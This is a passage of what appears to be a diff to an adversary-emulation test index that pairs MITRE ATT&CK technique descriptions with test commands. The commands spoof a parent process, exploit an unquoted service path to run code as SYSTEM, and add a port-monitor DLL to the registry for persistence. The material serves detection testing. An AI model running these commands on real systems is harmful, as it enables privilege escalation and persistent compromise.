a child of the first accessible svchost.exe + process. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, + ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | + Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} + -CommandLine ''#{command_line}''' + name: powershell + - name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe + process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_name: + description: Parent process to spoof from + type: path + default: "$Env:windir\\System32\\notepad.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent + -FilePath #{file_path} -CommandLine ''#{command_line}''' + name: powershell + T1034: + technique: + id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception + description: |- + **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** + + Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) + + There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + + ### Unquoted Paths + Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) + + ### PATH Environment Variable Misconfiguration + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + + ### Search Order Hijacking + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). + external_references: + - source_name: mitre-attack + external_id: T1034 + url: https://attack.mitre.org/techniques/T1034 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ + description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking + via .cmd or .bat file. Retrieved July 25, 2016. + source_name: TechNet MS14-019 + - url: http://support.microsoft.com/KB/103000 + description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. + Retrieved November 30, 2014. + source_name: Microsoft Subkey + - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Baggett, M. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved December 4, 2014. + source_name: Baggett 2012 + - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + source_name: SecurityBoulevard Unquoted Services APR 2018 + - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: McFarland, R. (2018, January 26). Windows Privilege Escalation + Guide. Retrieved August 10, 2018. + source_name: SploitSpren Windows Priv Jan 2018 + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 + description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December + 5, 2014. + source_name: Hill NT Shell + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx + description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. + source_name: MSDN Environment Property + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + revoked: false + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-07-06T18:49:35.645Z' + created: '2017-05-31T21:30:36.140Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_effective_permissions: + - User + - Administrator + - SYSTEM + x_mitre_detection: "Monitor file creation for files named after partial directories + and in locations that may be searched for common processes through the environment + variable, or otherwise should not be user writable. Monitor the executing + process for process executable paths that are named for partial directories. + Monitor file creation for programs that are named after Windows system programs + or programs commonly executed without a path (such as \"findstr,\" \"net,\" + and \"python\"). If this activity occurs outside of known administration activity, + upgrades, installations, or patches, then it may be suspicious. \n\nData and + events should not be viewed in isolation, but as part of a chain of behavior + that could lead to other activities, such as network connections made for + Command and Control, learning details about the environment through Discovery, + and Lateral Movement." + x_mitre_contributors: + - Stefan Kanthak + x_mitre_version: '1.0' + x_mitre_deprecated: true + atomic_tests: [] + T1574.007: + technique: + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable + description: |- + Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. + + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574.008: + technique: + id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. + + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + name: Path Interception by Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.008 + url: https://attack.mitre.org/techniques/T1574/008 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - source_name: Windows NT Command Shell + url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 + description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved + December 5, 2014. + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - source_name: Microsoft Environment Property + url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN + description: Microsoft. (2011, October 24). Environment Property. Retrieved + July 27, 2016. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: | + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - User + - SYSTEM + x_mitre_effective_permissions: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1574.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.009 + url: https://attack.mitre.org/techniques/T1574/009 + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + - source_name: Microsoft CurrentControlSet Services + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree + description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services + Registry Tree. Retrieved March 16, 2020. + - source_name: Help eliminate unquoted path + url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Mark Baggett. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved November 8, 2012. + - source_name: Windows Unquoted Services + url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + - source_name: Windows Privilege Escalation Guide + url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. + Retrieved August 10, 2018. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by Unquoted Path + description: |- + Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. + + Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) + + This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + identifier: T1574.009 + atomic_tests: + - name: Execution of program.exe as service with unquoted service path + auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f + description: | + When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability + known as Unquoted Service Path which allows a user to gain SYSTEM privileges. + In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. + supported_platforms: + - windows + input_arguments: + service_executable: + description: Path of the executable used for the service and as the hijacked + program.exe + type: path + default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe + executor: + command: | + copy #{service_executable} "C:\Program Files\windows_service.exe" + copy #{service_executable} "C:\program.exe" + sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto + sc start "Example Service" + cleanup_command: | + sc stop "Example Service" >nul 2>&1 + sc delete "Example Service" >nul 2>&1 + del "C:\Program Files\windows_service.exe" >nul 2>&1 + del "C:\program.exe" >nul 2>&1 + del "C:\Time.log" >nul 2>&1 + name: command_prompt + elevation_required: true + T1547.011: + technique: + created: '2020-01-24T20:02:59.149Z' + modified: '2021-03-30T00:51:59.629Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1547.011 + url: https://attack.mitre.org/techniques/T1547/011 + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html + description: Apple. (2016, September 13). Adding Login Items. Retrieved July + 11, 2017. + source_name: Adding Login Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Plist Modification + description: "Adversaries may modify plist files to run a program during system + boot or user login. Property list (plist) files contain all of the information + that macOS and OS X uses to configure applications and services. These files + are UTF-8 encoded and formatted like XML documents via a series of keys surrounded + by < >. They detail when programs should execute, file paths to the executables, + program arguments, required OS permissions, and many others. plists are located + in certain locations depending on their purpose such as /Library/Preferences + (which execute with elevated privileges) and ~/Library/Preferences + (which execute with a user's privileges). \n\nAdversaries can modify plist + files to execute their code as part of establishing persistence. plists may + also be used to elevate privileges since they may execute in the context of + another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for + execution at login is com.apple.loginitems.plist.(Citation: Methods + of Mac Malware Persistence) Applications under this plist run under the logged + in user's context, and will be started every time the user logs in. Login + items installed using the Service Management Framework are not visible in + the System Preferences and can only be removed by the application that created + them.(Citation: Adding Login Items) Users have direct control over login items + installed using a shared file list which are also visible in System Preferences + (Citation: Adding Login Items). Some of these applications can open visible + dialogs to the user, but they don’t all have to since there is an option to + \"hide\" the window. If an adversary can register their own login item or + modified an existing one, then they can use it to execute their code for a + persistence mechanism each time the user logs in (Citation: Malware Persistence + on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled + can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) + can do this as well. (Citation: Adding Login Items)" + id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. + + All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) + + Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1547.011 + atomic_tests: + - name: Plist Modification + auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 + description: 'Modify MacOS plist file in one of two directories + +' + supported_platforms: + - macos + executor: + steps: | + 1. Modify a .plist in + + /Library/Preferences + + OR + + ~/Library/Preferences + + 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) + name: manual + T1547.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.010 + url: https://attack.mitre.org/techniques/T1547/010 + - url: http://msdn.microsoft.com/en-us/library/dd183341 + description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, + 2014. + source_name: AddMonitor + - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf + description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint + slides]. Retrieved November 12, 2014. + source_name: Bloxham + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Port Monitors + description: "Adversaries may use port monitors to run an attacker supplied + DLL during system boot for persistence or privilege escalation. A port monitor + can be set through the AddMonitor API call to set a DLL to be + loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 + and will be loaded by the print spooler service, spoolsv.exe, on boot. The + spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) + Alternatively, an arbitrary DLL can be loaded if permissions allow writing + a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. + \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* + Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this + technique to load malicious code at startup that will persist on system reboot + and execute as SYSTEM." + id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-01-24T19:46:27.750Z' + created: '2020-01-24T19:46:27.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: + AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are + abnormal. New DLLs written to the System32 directory that do not correlate + with known good software or patching may be suspicious. \n\nMonitor Registry + writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. + Run the Autoruns utility, which checks for this Registry key as a persistence + mechanism (Citation: TechNet Autoruns)" + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_contributors: + - Stefan Kanthak + - Travis Smith, Tripwire + x_mitre_platforms: + - Windows + identifier: T1547.010 + atomic_tests: + - name: Add Port Monitor persistence in Registry + auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent + reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + supported_platforms: + - windows + input_arguments: + monitor_dll: + description: Addition to port monitor registry key. Normally refers to a + DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions + allow writing a fully-qualified pathname for that DLL. + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" + /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ + +' + cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + +' + name: command_prompt + elevation_required: true + T1055.002: + technique: + created: '2020-01-14T01:27:31.344Z' + modified: '2020-11-10T18:29:30.882Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 + description: "Adversaries may inject portable executables (PE) into processes + in order to evade process-based defenses as well as possibly elevate privileges. + PE injection is a method of executing arbitrary code in the address space + of a separate live process. \n\nPE injection is commonly performed by copying + code (perhaps without a file on disk) into the virtual address space of the + target process before invoking it via a new thread. The write can be performed + with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, + then invoked with CreateRemoteThread or additional code (ex: + shellcode). The displacement of the injected code does introduce the additional + requirement for functionality to remap memory references. (Citation: Elastic + Process Injection July 2017) \n\nRunning code in the context of another process + may allow access to the process's memory, system/network resources, and possibly + elevated privileges. Execution via PE injection may also evade detection from + security products since the execution is masked under a legitimate process. " + name: Portable Executable Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.002 + url: https://attack.mitre.org/techniques/T1055/002 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread and those that can be used to modify + memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + atomic_tests: [] + T1546.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.013 + url: https://attack.mitre.org/techniques/T1546/013 + - source_name: Microsoft About Profiles + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 + description: Microsoft. (2017, November 29). About Profiles. Retrieved June + 14, 2019. + - source_name: ESET Turla PowerShell May 2019 + url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ + description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell + usage. Retrieved June 14, 2019. + - source_name: Wits End and Shady PowerShell Profiles + url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html + description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege + Elevation using the Powershell Profile. Retrieved July 8, 2019.' + - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf + description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING + CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. + source_name: Malware Archaeology 